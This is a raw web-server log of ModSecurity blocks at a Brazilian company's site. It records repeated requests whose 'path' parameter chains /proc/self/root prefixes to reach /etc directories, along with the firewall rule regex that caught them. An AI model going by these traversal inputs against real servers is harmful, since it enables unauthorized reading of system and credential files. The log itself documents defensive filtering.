https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:31:12.957971 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.243.128:52574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrhYAbLMZ6AikZjR9Xl7AAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:32:19.934676 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.243.128:52578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrhowbLMZ6AikZjR9XmfAAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:32:26.035313 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:48074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrhqimAPhZkrhU8w4mT2AAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:32:38.495258 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:48082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrhtgkwaGbbGflqUZA4nwAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:33:02.994609 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:37724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrhzfu8EFLIOrSqIpsotQAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:33:25.987331 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:41360] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrh5da6ubjKNq_cu4bFqgAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:33:42.730689 2026] [:error] [pid 15826:tid 140411691570944] [client 216.73.216.191:4615] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt 1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrh9uoXxyEfFpUF8f-Y1wAAAUY"]
[Wed Mar 18 14:33:46.388102 2026] [:error] [pid 17887:tid 140411582465792] [client 216.73.216.191:19623] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-14"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrh-AkwaGbbGflqUZA47QAAANM"]
[Wed Mar 18 14:33:49.647826 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:50756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrh_cdf6f5d65gmYZT8MwAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:33:49.742035 2026] [:error] [pid 29882:tid 140411741927168] [client 216.73.216.191:62566] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/greenwich"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrh_UzinOy1jxa1j4dBjAAAAQA"]
[Wed Mar 18 14:33:49.975000 2026] [:error] [pid 29882:tid 140411548894976] [client 216.73.216.191:24138] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrh_UzinOy1jxa1j4dBjQAAARc"]
[Wed Mar 18 14:33:52.271600 2026] [:error] [pid 15826:tid 140411741927168] [client 216.73.216.191:46523] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-12"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abriAOoXxyEfFpUF8f-Y4AAAAUA"]
[Wed Mar 18 14:34:18.479492 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:36858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abriGvu8EFLIOrSqIpspDwAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:34:23.539339 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:44556] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abriH0zinOy1jxa1j4dBqwAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:34:24.430501 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.244.43:51702] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abriIOoXxyEfFpUF8f-ZCgAAAVg"]
[Wed Mar 18 14:34:29.111110 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.228.61:56344] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abriJeyqAr6etmhZHNrvLwAAAFQ"]
[Wed Mar 18 14:34:42.853629 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.243.128:44558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abriMgbLMZ6AikZjR9XnLAAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:34:46.907737 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:33242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abriNuw_le52K8_3pV0EnQAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:35:35.587193 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.243.128:33248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abriZ0zinOy1jxa1j4dCFgAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:35:38.195096 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:51334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abriaimAPhZkrhU8w4mUqwAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:36:04.197063 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:44610] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrihAkwaGbbGflqUZA5pwAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:36:05.622992 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:40764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrihSmAPhZkrhU8w4mU0AAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:36:18.133881 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.243.128:40778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrikuw_le52K8_3pV0FAQAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:37:21.183174 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:33092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abri0SmAPhZkrhU8w4mVJgAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
